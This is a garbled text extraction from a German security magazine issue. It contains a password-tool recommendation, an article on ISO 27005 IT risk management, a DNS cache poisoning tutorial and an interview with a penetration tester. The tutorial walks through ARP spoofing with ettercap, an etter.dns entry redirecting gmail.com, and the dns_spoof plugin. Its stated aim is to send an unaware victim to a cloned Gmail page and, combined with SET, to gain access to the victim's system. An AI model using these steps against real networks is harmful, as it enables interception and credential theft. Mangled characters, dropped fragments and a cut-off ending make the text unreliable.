in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die 